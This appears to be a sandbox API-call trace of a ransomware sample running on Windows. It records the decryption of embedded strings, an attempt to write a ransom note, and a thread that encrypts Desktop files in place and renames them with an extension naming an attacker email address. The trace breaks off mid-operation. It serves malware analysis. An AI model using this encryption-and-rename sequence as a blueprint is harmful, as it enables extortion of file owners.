[0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544478 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c490 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544488 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a5f8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544498 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c4b8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444a8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539e60 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444b8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5435f8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444c8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c4e0 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444d8 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539e80 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444e8 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ea0 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5444f8 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c508 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544508 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c530 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544518 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ec0 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544528 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x543628 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544538 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539ee0 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544548 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c558 | out: hHeap=0x520000) returned 1 [0133.928] GetProcessHeap () returned 0x520000 [0133.928] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544558 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c580 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544568 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539f00 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544578 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539f20 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544588 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544598 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5a8 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445a8 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b80 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445b8 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544ba0 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445c8 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5d0 | out: hHeap=0x520000) returned 1 [0133.929] GetProcessHeap () returned 0x520000 [0133.929] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445d8 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x546448 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445e8 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544bc0 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5445f8 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544be0 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544608 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544c00 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544618 | out: hHeap=0x520000) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c5d0 [0133.930] CryptImportKey (in: hProv=0x534c10, pbData=0x71fea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53a5f8) returned 1 [0133.930] CryptDecrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c5d0, pdwDataLen=0x71ff10 | out: pbData=0x53c5d0, pdwDataLen=0x71ff10) returned 1 [0133.930] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.930] GetProcessHeap () returned 0x520000 [0133.930] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c5a8 [0133.930] CryptImportKey (in: hProv=0x534c10, pbData=0x71fea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53a5f8) returned 1 [0133.930] CryptDecrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c5a8, pdwDataLen=0x71ff10 | out: pbData=0x53c5a8, pdwDataLen=0x71ff10) returned 1 [0133.930] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.931] GetProcessHeap () returned 0x520000 [0133.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c580 [0133.931] CryptImportKey (in: hProv=0x534c10, pbData=0x71fea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53a5f8) returned 1 [0133.931] CryptDecrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x53c580, pdwDataLen=0x71ff10 | out: pbData=0x53c580, pdwDataLen=0x71ff10) returned 1 [0133.931] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.931] GetProcessHeap () returned 0x520000 [0133.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535540 [0133.931] CryptImportKey (in: hProv=0x534c10, pbData=0x71fea8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53a5f8) returned 1 [0133.931] CryptDecrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535540, pdwDataLen=0x71ff10 | out: pbData=0x535540, pdwDataLen=0x71ff10) returned 1 [0133.931] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.931] GetProcessHeap () returned 0x520000 [0133.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10838) returned 0x546c30 [0133.932] GetProcessHeap () returned 0x520000 [0133.932] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x2140020 [0133.932] wsprintfW (in: param_1=0x556c62, param_2=".[%08X].[%s].%s" | out: param_1=".[4B2E4630].[johncastle@msgsafe.io].zes") returned 39 [0133.932] GetProcessHeap () returned 0x520000 [0133.932] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10058) returned 0x557470 [0133.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4027f0, lpParameter=0x546c30, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0133.934] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0xffffffff) returned 0x0 [0134.666] CloseHandle (hObject=0x12c) returned 1 [0134.666] GetProcessHeap () returned 0x520000 [0134.666] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2140020 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.667] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x546c30 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.667] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535540 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.667] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c580 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.667] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5a8 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.667] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c5d0 | out: hHeap=0x520000) returned 1 [0134.667] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544990 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544a18 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544890 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544958 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5433d8 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443a8 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x534ec0 | out: hHeap=0x520000) returned 1 [0134.668] GetProcessHeap () returned 0x520000 [0134.668] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443a8 [0134.668] PostMessageW (hWnd=0x5011c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1 [0135.267] GetProcessHeap () returned 0x520000 [0135.267] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0135.267] CryptImportKey (in: hProv=0x534c10, pbData=0x71fec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0135.267] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588, pdwDataLen=0x71ff30 | out: pbData=0x535588, pdwDataLen=0x71ff30) returned 1 [0135.267] CryptDestroyKey (hKey=0x546448) returned 1 [0135.267] GetProcessHeap () returned 0x520000 [0135.267] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x5355d0 [0135.267] CryptImportKey (in: hProv=0x534c10, pbData=0x71fec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0135.267] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x5355d0, pdwDataLen=0x71ff30 | out: pbData=0x5355d0, pdwDataLen=0x71ff30) returned 1 [0135.267] CryptDestroyKey (hKey=0x546448) returned 1 [0135.267] GetProcessHeap () returned 0x520000 [0135.267] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6e0) returned 0x56d0e0 [0135.267] CryptImportKey (in: hProv=0x534c10, pbData=0x71fec8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x546448) returned 1 [0135.267] CryptDecrypt (in: hKey=0x546448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d0e0, pdwDataLen=0x71ff30 | out: pbData=0x56d0e0, pdwDataLen=0x71ff30) returned 1 [0135.267] CryptDestroyKey (hKey=0x546448) returned 1 [0135.268] wsprintfW (in: param_1=0x71ef0c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt") returned 56 [0135.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\readme-warning.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme-warning.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.268] GetProcessHeap () returned 0x520000 [0135.268] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x56d0e0 | out: hHeap=0x520000) returned 1 [0135.268] GetProcessHeap () returned 0x520000 [0135.268] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5355d0 | out: hHeap=0x520000) returned 1 [0135.268] GetProcessHeap () returned 0x520000 [0135.268] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 Thread: id = 118 os_tid = 0x5b8 [0133.948] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0133.948] GetProcessHeap () returned 0x520000 [0133.948] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5c) returned 0x544aa0 [0133.948] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*", lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7d60e200, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x7d60e200, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName=".", cAlternateFileName="")) returned 0x544b08 [0133.948] GetProcessHeap () returned 0x520000 [0133.948] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0133.949] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7d60e200, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0x7d60e200, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="..", cAlternateFileName="")) returned 1 [0133.949] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x254f7df0, ftCreationTime.dwHighDateTime=0x1d5e7ae, ftLastAccessTime.dwLowDateTime=0x66f7cba0, ftLastAccessTime.dwHighDateTime=0x1d5e569, ftLastWriteTime.dwLowDateTime=0x66f7cba0, ftLastWriteTime.dwHighDateTime=0x1d5e569, nFileSizeHigh=0x0, nFileSizeLow=0x7dc2, dwReserved0=0x0, dwReserved1=0xffff, cFileName="0XH GEu.wav", cAlternateFileName="0XHGEU~1.WAV")) returned 1 [0133.949] GetProcessHeap () returned 0x520000 [0133.949] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x25e) returned 0x5684d8 [0133.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XH GEu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xh geu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0133.949] GetProcessHeap () returned 0x520000 [0133.949] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0133.949] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0133.950] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0133.950] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xe, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xe, lpOverlapped=0x0) returned 1 [0133.951] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.951] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.951] GetProcessHeap () returned 0x520000 [0133.951] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0133.951] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0133.952] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.952] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0133.952] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0133.952] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0133.952] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0133.952] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0133.952] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0133.952] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.952] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.952] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.952] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x7dc2, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x7dc2, lpOverlapped=0x0) returned 1 [0133.953] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7dd0, dwBufLen=0x7dd0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7dd0) returned 1 [0133.954] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.954] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x7dd0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x7dd0, lpOverlapped=0x0) returned 1 [0133.954] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.954] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x7ea4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.954] SetEndOfFile (hFile=0x124) returned 1 [0133.958] GetProcessHeap () returned 0x520000 [0133.958] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0133.958] GetProcessHeap () returned 0x520000 [0133.958] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0133.959] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XH GEu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xh geu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0XH GEu.wav.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0xh geu.wav.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0133.966] CloseHandle (hObject=0x124) returned 1 [0133.966] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0133.966] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a96f910, ftCreationTime.dwHighDateTime=0x1d5e325, ftLastAccessTime.dwLowDateTime=0x574b5d00, ftLastAccessTime.dwHighDateTime=0x1d5da85, ftLastWriteTime.dwLowDateTime=0x574b5d00, ftLastWriteTime.dwHighDateTime=0x1d5da85, nFileSizeHigh=0x0, nFileSizeLow=0x5b60, dwReserved0=0x0, dwReserved1=0xffff, cFileName="4D-19xSRnhVYoDBhN50S.mp4", cAlternateFileName="4D-19X~1.MP4")) returned 1 [0133.966] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4D-19xSRnhVYoDBhN50S.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4d-19xsrnhvyodbhn50s.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0133.967] GetProcessHeap () returned 0x520000 [0133.967] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0133.967] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0133.967] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0133.967] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0133.967] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0133.967] GetProcessHeap () returned 0x520000 [0133.967] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0133.967] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0133.967] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.967] WriteFile (in: 